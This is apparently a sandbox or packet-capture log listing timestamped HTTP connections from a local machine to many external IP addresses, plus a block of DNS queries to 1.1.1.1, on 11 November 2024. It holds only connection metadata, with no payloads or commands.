                                                                                                                                                                                                                  Nov 11, 2024 18:51:17.440468073 CET5919280192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:17.747220039 CET8053772162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:17.747725964 CET5377280192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:18.273552895 CET8052124162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:18.273616076 CET5212480192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.296432972 CET5919780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.296746969 CET5919580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.296869993 CET5919680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.297368050 CET5919880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.298753023 CET5919980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303050995 CET8059197199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303062916 CET805919544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303070068 CET8059196199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303078890 CET805919844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303167105 CET5919780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303179979 CET5919680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303179026 CET5919580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303529978 CET80591993.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303560019 CET5919880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303577900 CET5919980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.303925037 CET5919980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.304039001 CET5919680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.308748960 CET80591993.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.308970928 CET8059196199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.314600945 CET5920080192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.316389084 CET5919580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.316392899 CET5919880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.318542957 CET5919780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.319470882 CET8059200188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.319525957 CET5920080192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.321188927 CET805919544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.321463108 CET805919844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.323373079 CET8059197199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.730324984 CET8059197199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.730438948 CET5919780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.730525970 CET8059197199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.730575085 CET5919780192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.731360912 CET805919844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.731431007 CET5919880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.732925892 CET805919544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.732974052 CET5919580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.733899117 CET80591993.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.733943939 CET5919980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.739073992 CET805919844.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.739121914 CET5919880192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.740649939 CET805919544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.740690947 CET5919580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.741055012 CET80591993.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:19.741092920 CET5919980192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.480437994 CET8059196199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.480504990 CET5919680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.480606079 CET8059196199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.480619907 CET8059196199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.480650902 CET5919680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.480671883 CET5919680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.481296062 CET8059196199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.481307983 CET8059196199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.481353045 CET5919680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.481792927 CET8059196199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.481803894 CET8059196199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.481846094 CET5919680192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:21.482537031 CET8059196199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.197483063 CET5921280192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.202833891 CET8059212199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.241648912 CET5921380192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.241919994 CET5921480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.244041920 CET5921580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.245412111 CET5921880192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.245932102 CET5921980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.246222019 CET5922080192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.246963024 CET80592133.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.246992111 CET8059214178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.247034073 CET5921380192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.247056961 CET5921480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.247133017 CET5922180192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.247227907 CET5921480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.248976946 CET805921544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.249033928 CET5921580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.249823093 CET5921580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.250278950 CET805921818.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.250343084 CET5921880192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.250724077 CET5922280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.250806093 CET805921944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.250823021 CET5921880192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.250869989 CET5921980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.251024008 CET5921980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.251034021 CET8059220162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.251096010 CET5922080192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.251224041 CET5922080192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.251998901 CET8059221154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.252015114 CET5922380192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.252053976 CET5922180192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.252132893 CET5922180192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.252247095 CET8059214178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.252877951 CET5921680192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.253488064 CET5921380192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.254645109 CET805921544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.255613089 CET805922299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.255640984 CET805921818.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.255686045 CET5922280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.255786896 CET805921944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.255959034 CET8059220162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.256028891 CET5922280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.256876945 CET8059223188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.256926060 CET5922380192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.257013083 CET8059221154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.257673025 CET8059216199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.257725000 CET5921680192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.258290052 CET80592133.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.259053946 CET5921680192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.260509014 CET5922380192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.260749102 CET5921780192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.260786057 CET805922299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.263863087 CET8059216199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.265377998 CET8059223188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.265579939 CET8059217208.100.26.245192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.265639067 CET5921780192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.660737038 CET8059214178.162.203.226192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.660834074 CET5921480192.168.2.6178.162.203.226
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685470104 CET80592133.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685560942 CET5921380192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685672998 CET805921544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685857058 CET5921580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685869932 CET805921818.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.685966969 CET5921880192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.689420938 CET805921944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.689449072 CET805922299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.689589024 CET5921980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.689589024 CET5922280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.691929102 CET8059216199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.691992998 CET5921680192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692043066 CET8059216199.59.243.227192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692086935 CET5921680192.168.2.6199.59.243.227
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692364931 CET80592133.94.10.34192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692439079 CET5921380192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692476034 CET805921544.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692529917 CET5921580192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692583084 CET805921818.208.156.248192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.692643881 CET5921880192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.695494890 CET805922299.83.170.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.695564032 CET5922280192.168.2.699.83.170.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.698400974 CET805921944.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.698458910 CET5921980192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.786689997 CET8059220162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:25.788733959 CET5922080192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.028939962 CET8059223188.114.96.3192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.029010057 CET5922380192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.071836948 CET5922580192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.074873924 CET5922680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.077430010 CET8059225162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.077531099 CET5922580192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.080318928 CET805922644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.080375910 CET5922680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.143194914 CET8059221154.212.231.82192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.143279076 CET5922180192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.702663898 CET8059212199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.702774048 CET5921280192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.951888084 CET5922680192.168.2.644.221.84.105
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.952080965 CET5922580192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.957079887 CET805922644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:26.957298994 CET8059225162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:27.046267986 CET805922644.221.84.105192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820472002 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820483923 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820493937 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820508003 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.820540905 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.824218988 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.824315071 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.824326038 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.824378014 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907629967 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907691002 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907766104 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907778978 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907819033 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.907849073 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908184052 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908199072 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908241987 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908257008 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908576965 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908590078 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908629894 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.908997059 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.909008980 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.909022093 CET805925091.195.240.19192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.909049034 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:35.909065962 CET5925080192.168.2.691.195.240.19
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.199882984 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.199942112 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.199954987 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200016975 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200155973 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200351954 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200366020 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200397968 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200409889 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200726032 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200737953 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200750113 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200762987 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200776100 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.200802088 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.205306053 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.205399036 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.205409050 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.205451965 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282188892 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282282114 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282295942 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282334089 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282375097 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282630920 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282644033 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.282681942 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.283970118 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284198999 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284243107 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284334898 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284347057 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284384966 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284682989 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284694910 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284708977 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284735918 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.284744024 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285439014 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285450935 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285463095 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285475969 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285489082 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285495996 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285518885 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.285545111 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286168098 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286183119 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286195040 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286220074 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286231041 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286592960 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286609888 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286623001 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286643982 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.286672115 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.287494898 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.287544966 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.363358974 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.363420963 CET8059240199.191.50.83192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.363441944 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:36.363471985 CET5924080192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.464205980 CET8059203162.255.119.102192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:51:37.464268923 CET5920380192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.214672089 CET5024180192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:38.214767933 CET5024080192.168.2.63.94.10.34
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.624592066 CET5212380192.168.2.6208.100.26.245
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.624722004 CET5022780192.168.2.6154.212.231.82
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.624803066 CET5022680192.168.2.618.208.156.248
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.624836922 CET5022880192.168.2.6199.191.50.83
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.624969006 CET5212880192.168.2.6188.114.96.3
                                                                                                                                                                                                                  Nov 11, 2024 18:51:39.625320911 CET5212480192.168.2.6162.255.119.102
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.799455881 CET5214980192.168.2.6208.100.26.245
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.000561953 CET5216453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.249588966 CET53521641.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.359999895 CET6474453192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.360097885 CET5131153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.362373114 CET6310353192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.365150928 CET6461653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.365709066 CET5557053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.365735054 CET5724653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.367583990 CET53647441.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.368521929 CET6036753192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.368560076 CET53513111.1.1.1192.168.2.6
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.368657112 CET4923653192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.369975090 CET6115053192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.370503902 CET5442153192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.371145964 CET6377853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.371927977 CET6203853192.168.2.61.1.1.1
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.372406960 CET6397453192.168.2.61.1.1.1
